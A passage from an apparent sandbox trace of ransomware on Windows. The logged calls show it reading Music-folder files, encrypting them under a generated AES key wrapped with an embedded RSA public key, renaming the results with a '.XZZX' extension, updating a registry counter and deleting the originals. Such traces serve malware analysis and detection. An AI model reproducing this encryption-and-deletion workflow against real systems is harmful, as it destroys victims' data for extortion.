dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x175f9 [0051.666] WriteFile (in: hFile=0x5c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x49ee438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x49ee438*=0x5, lpOverlapped=0x0) returned 1 [0051.666] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x175fe [0051.666] WriteFile (in: hFile=0x5c8, lpBuffer=0x49ef860*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x49ee438, lpOverlapped=0x0 | out: lpBuffer=0x49ef860*, lpNumberOfBytesWritten=0x49ee438*=0x22, lpOverlapped=0x0) returned 1 [0051.666] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x17620 [0051.666] WriteFile (in: hFile=0x5c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x49ee438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x49ee438*=0x5, lpOverlapped=0x0) returned 1 [0051.666] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x17625 [0051.666] SetErrorMode (uMode=0x1) returned 0x1 [0051.666] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0051.666] OutputDebugStringW (lpOutputString="end") [0051.667] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----w°I/\x04`Õ\x9e\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x49edbf4, pcbBinary=0x49ed3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x49edbf4, pcbBinary=0x49ed3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0051.667] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x49edbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x49ed3dc, pcbStructInfo=0x49ed3d8 | out: pvStructInfo=0x49ed3dc, pcbStructInfo=0x49ed3d8) returned 1 [0051.667] CryptAcquireContextW (in: phProv=0x49ed3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x49ed3e4*=0x3e43b08) returned 1 [0051.667] CryptImportPublicKeyInfo (in: hCryptProv=0x3e43b08, dwCertEncodingType=0x1, pInfo=0x42e07a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e07d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e07d8*, PublicKey.cUnusedBits=0x0), phKey=0x49ed3ec | out: phKey=0x49ed3ec*=0x3e286f8) returned 1 [0051.667] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0051.668] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0051.668] CryptEncrypt (in: hKey=0x3e286f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x49ed3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x49ed3f0*=0x80) returned 1 [0051.668] CryptEncrypt (in: hKey=0x3e286f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e43b90*, pdwDataLen=0x49ed3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e43b90*, pdwDataLen=0x49ed3e8*=0x80) returned 1 [0051.668] WriteFile (in: hFile=0x5c8, lpBuffer=0x3e43b90*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x49ee438, lpOverlapped=0x0 | out: lpBuffer=0x3e43b90*, lpNumberOfBytesWritten=0x49ee438*=0x80, lpOverlapped=0x0) returned 1 [0051.668] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0051.668] WriteFile (in: hFile=0x5c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x49ee438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x49ee438*=0x5, lpOverlapped=0x0) returned 1 [0051.668] GetUserNameW (in: lpBuffer=0x49ee1f8, pcbBuffer=0x49edfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x49edfe0) returned 1 [0051.669] wsprintfW (in: param_1=0x49edff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0051.669] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x49edfe4 | out: phkResult=0x49edfe4*=0x5fc) returned 0x0 [0051.669] RegQueryValueExW (in: hKey=0x5fc, lpValueName="E1010314", lpReserved=0x0, lpType=0x49edfd8, lpData=0x49edfec, lpcbData=0x49edfdc*=0x4 | out: lpType=0x49edfd8*=0x4, lpData=0x49edfec*=0x59, lpcbData=0x49edfdc*=0x4) returned 0x0 [0051.669] RegCloseKey (hKey=0x5fc) returned 0x0 [0051.669] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x49edfe8 | out: phkResult=0x49edfe8*=0x5fc) returned 0x0 [0051.669] RegSetValueExW (in: hKey=0x5fc, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x49edfec*=0x5a, cbData=0x4 | out: lpData=0x49edfec*=0x5a) returned 0x0 [0051.669] RegCloseKey (hKey=0x5fc) returned 0x0 [0051.669] VirtualFree (lpAddress=0x4290000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0051.669] VirtualFree (lpAddress=0x42a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0051.670] CloseHandle (hObject=0x5c8) returned 1 [0051.675] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0051.676] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0051.676] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Z9ycP6znphCfb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z9ycp6znphcfb.m4a")) returned 1 [0051.676] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Z9ycP6znphCfb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z9ycp6znphcfb.m4a")) returned 0 Thread: id = 188 os_tid = 0xae0 [0051.263] lstrcpyA (in: lpString1=0x4dcfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0051.264] lstrcpyW (in: lpString1=0x4dcf460, lpString2="6Fs5O-wZK5i.m4a" | out: lpString1="6Fs5O-wZK5i.m4a") returned="6Fs5O-wZK5i.m4a" [0051.264] lstrcpyW (in: lpString1=0x4dce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0051.264] SetErrorMode (uMode=0x1) returned 0x1 [0051.264] lstrcpyW (in: lpString1=0x4dcf860, lpString2="6Fs5O-wZK5i.m4a" | out: lpString1="6Fs5O-wZK5i.m4a") returned="6Fs5O-wZK5i.m4a" [0051.264] CoCreateGuid (in: pguid=0x4dce440 | out: pguid=0x4dce440*(Data1=0xfcb3ced0, Data2=0xb7ac, Data3=0x450b, Data4=([0]=0xb9, [1]=0xa, [2]=0x80, [3]=0x46, [4]=0x8b, [5]=0xdc, [6]=0x85, [7]=0xc3))) returned 0x0 [0051.264] wsprintfW (in: param_1=0x4dcec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\6Fs5O-wZK5i.m4a") returned 74 [0051.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x4dcfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0051.264] wsprintfW (in: param_1=0x4dce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\51A5A3C031894064FCB3CED0366624AC.XZZX") returned 96 [0051.264] StrStrW (lpFirst="6Fs5O-wZK5i.m4a", lpSrch="XZZX") returned 0x0 [0051.264] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\6Fs5O-wZK5i.m4a", dwFileAttributes=0x20) returned 1 [0051.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\6Fs5O-wZK5i.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\6fs5o-wzk5i.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x614 [0051.265] ReadFile (in: hFile=0x614, lpBuffer=0x4371080, nNumberOfBytesToRead=0x14558, lpNumberOfBytesRead=0x4dce418, lpOverlapped=0x0 | out: lpBuffer=0x4371080*, lpNumberOfBytesRead=0x4dce418*=0x14558, lpOverlapped=0x0) returned 1 [0051.265] CloseHandle (hObject=0x614) returned 1 [0051.265] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x42b0000 [0051.266] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x42c0000 [0051.266] SetErrorMode (uMode=0x1) returned 0x1 [0051.266] lstrcpyW (in: lpString1=0x4dce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0051.266] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e438e8) returned 1 [0051.268] CryptGenKey (in: hProv=0x3e438e8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e287f8) returned 1 [0051.764] CryptExportKey (in: hKey=0x3e287f8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x4dce41c | out: pbData=0x0*, pdwDataLen=0x4dce41c*=0x94) returned 1 [0051.765] CryptExportKey (in: hKey=0x3e287f8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x42c0000, pdwDataLen=0x4dce41c | out: pbData=0x42c0000*, pdwDataLen=0x4dce41c*=0x94) returned 1 [0051.765] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0051.766] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0051.767] CryptDestroyKey (hKey=0x3e287f8) returned 1 [0051.767] CryptReleaseContext (hProv=0x3e43970, dwFlags=0x0) returned 0 [0051.768] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\51A5A3C031894064FCB3CED0366624AC.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\51a5a3c031894064fcb3ced0366624ac.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5f4 [0051.769] WriteFile (in: hFile=0x5f4, lpBuffer=0x4371080*, nNumberOfBytesToWrite=0x14558, lpNumberOfBytesWritten=0x4dce438, lpOverlapped=0x0 | out: lpBuffer=0x4371080*, lpNumberOfBytesWritten=0x4dce438*=0x14558, lpOverlapped=0x0) returned 1 [0051.773] SetFilePointer (in: hFile=0x5f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x14558 [0051.773] WriteFile (in: hFile=0x5f4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x4dce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x4dce438*=0x5, lpOverlapped=0x0) returned 1 [0051.773] SetFilePointer (in: hFile=0x5f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1455d [0051.773] WriteFile (in: hFile=0x5f4, lpBuffer=0x4dcf860*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x4dce438, lpOverlapped=0x0 | out: lpBuffer=0x4dcf860*, lpNumberOfBytesWritten=0x4dce438*=0x1e, lpOverlapped=0x0) returned 1 [0051.773] SetFilePointer (in: hFile=0x5f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1457b [0051.773] WriteFile (in: hFile=0x5f4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x4dce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x4dce438*=0x5, lpOverlapped=0x0) returned 1 [0051.775] SetFilePointer (in: hFile=0x5f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x14580 [0051.775] SetErrorMode (uMode=0x1) returned 0x1 [0051.775] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0051.775] OutputDebugStringW (lpOutputString="end") [0051.776] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----w°I/\x04`ÕÜ\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x4dcdbf4, pcbBinary=0x4dcd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x4dcdbf4, pcbBinary=0x4dcd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0051.776] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x4dcdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x4dcd3dc, pcbStructInfo=0x4dcd3d8 | out: pvStructInfo=0x4dcd3dc, pcbStructInfo=0x4dcd3d8) returned 1 [0051.776] CryptAcquireContextW (in: phProv=0x4dcd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x4dcd3e4*=0x4399c68) returned 1 [0051.779] CryptImportPublicKeyInfo (in: hCryptProv=0x4399c68, dwCertEncodingType=0x1, pInfo=0x42e0a10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e0a40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e0a48*, PublicKey.cUnusedBits=0x0), phKey=0x4dcd3ec | out: phKey=0x4dcd3ec*=0x3e287f8) returned 1 [0051.779] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0051.780] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0051.780] CryptEncrypt (in: hKey=0x3e287f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x4dcd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x4dcd3f0*=0x80) returned 1 [0051.780] CryptEncrypt (in: hKey=0x3e287f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4399cf0*, pdwDataLen=0x4dcd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x4399cf0*, pdwDataLen=0x4dcd3e8*=0x80) returned 1 [0051.780] WriteFile (in: hFile=0x5f4, lpBuffer=0x4399cf0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x4dce438, lpOverlapped=0x0 | out: lpBuffer=0x4399cf0*, lpNumberOfBytesWritten=0x4dce438*=0x80, lpOverlapped=0x0) returned 1 [0051.780] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0051.780] WriteFile (in: hFile=0x5f4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x4dce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x4dce438*=0x5, lpOverlapped=0x0) returned 1 [0051.780] GetUserNameW (in: lpBuffer=0x4dce1f8, pcbBuffer=0x4dcdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x4dcdfe0) returned 1 [0051.781] wsprintfW (in: param_1=0x4dcdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0051.783] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x4dcdfe4 | out: phkResult=0x4dcdfe4*=0x604) returned 0x0 [0051.783] RegQueryValueExW (in: hKey=0x604, lpValueName="E1010314", lpReserved=0x0, lpType=0x4dcdfd8, lpData=0x4dcdfec, lpcbData=0x4dcdfdc*=0x4 | out: lpType=0x4dcdfd8*=0x4, lpData=0x4dcdfec*=0x5c, lpcbData=0x4dcdfdc*=0x4) returned 0x0 [0051.783] RegCloseKey (hKey=0x604) returned 0x0 [0051.783] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x4dcdfe8 | out: phkResult=0x4dcdfe8*=0x604) returned 0x0 [0051.783] RegSetValueExW (in: hKey=0x604, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x4dcdfec*=0x5d, cbData=0x4 | out: lpData=0x4dcdfec*=0x5d) returned 0x0 [0051.783] RegCloseKey (hKey=0x604) returned 0x0 [0051.783] VirtualFree (lpAddress=0x42b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0051.784] VirtualFree (lpAddress=0x42c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0051.784] CloseHandle (hObject=0x5f4) returned 1 [0051.787] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0051.789] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0051.791] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\6Fs5O-wZK5i.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\6fs5o-wzk5i.m4a")) returned 1 [0051.792] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\6Fs5O-wZK5i.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\6fs5o-wzk5i.m4a")) returned 0 Thread: id = 189 os_tid = 0xb48 [0051.476] lstrcpyA (in: lpString1=0x41bfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0051.476] lstrcpyW (in: lpString1=0x41bf460, lpString2="6Fs5O-wZK5i.m4a" | out: lpString1="6Fs5O-wZK5i.m4a") returned="6Fs5O-wZK5i.m4a" [0051.476] lstrcpyW (in: lpString1=0x41be860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0051.476] SetErrorMode (uMode=0x1) returned 0x1 [0051.476] lstrcpyW (in: lpString1=0x41bf860, lpString2="6Fs5O-wZK5i.m4a" | out: lpString1="6Fs5O-wZK5i.m4a") returned="6Fs5O-wZK5i.m4a" [0051.476] CoCreateGuid (in: pguid=0x41be440 | out: pguid=0x41be440*(Data1=0xaca7c0d6, Data2=0x804a, Data3=0x4c3e, Data4=([0]=0xa2, [1]=0x2e, [2]=0x60, [3]=0x35, [4]=0x82, [5]=0x52, [6]=0x86, [7]=0x7b))) returned 0x0 [0051.476] wsprintfW (in: param_1=0x41bec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\6Fs5O-wZK5i.m4a") returned 74 [0051.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x41bfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0051.477] wsprintfW (in: param_1=0x41be450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\C8E8BDDC263509ECACA7C0D62A50EE34.XZZX") returned 96 [0051.477] StrStrW (lpFirst="6Fs5O-wZK5i.m4a", lpSrch="XZZX") returned 0x0 [0051.477] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\6Fs5O-wZK5i.m4a", dwFileAttributes=0x20) returned 1 [0051.477] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\6Fs5O-wZK5i.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\6fs5o-wzk5i.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x614 [0051.478] ReadFile (in: hFile=0x614, lpBuffer=0x43855e0, nNumberOfBytesToRead=0x14558, lpNumberOfBytesRead=0x41be418, lpOverlapped=0x0 | out: lpBuffer=0x43855e0*, lpNumberOfBytesRead=0x41be418*=0x14558, lpOverlapped=0x0) returned 1 [0051.478] CloseHandle (hObject=0x614) returned 1 [0051.478] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x46d0000 [0051.478] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x46e0000 [0051.479] SetErrorMode (uMode=0x1) returned 0x1 [0051.479] lstrcpyW (in: lpString1=0x41be358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0051.479] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e43970) returned 1 [0051.482] CryptGenKey (in: hProv=0x3e43970, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e28838) returned 1 [0051.846] CryptExportKey (in: hKey=0x3e28838, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x41be41c | out: pbData=0x0*, pdwDataLen=0x41be41c*=0x94) returned 1 [0051.846] CryptExportKey (in: hKey=0x3e28838, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x46e0000, pdwDataLen=0x41be41c | out: pbData=0x46e0000*, pdwDataLen=0x41be41c*=0x94) returned 1 [0051.846] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0051.847] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 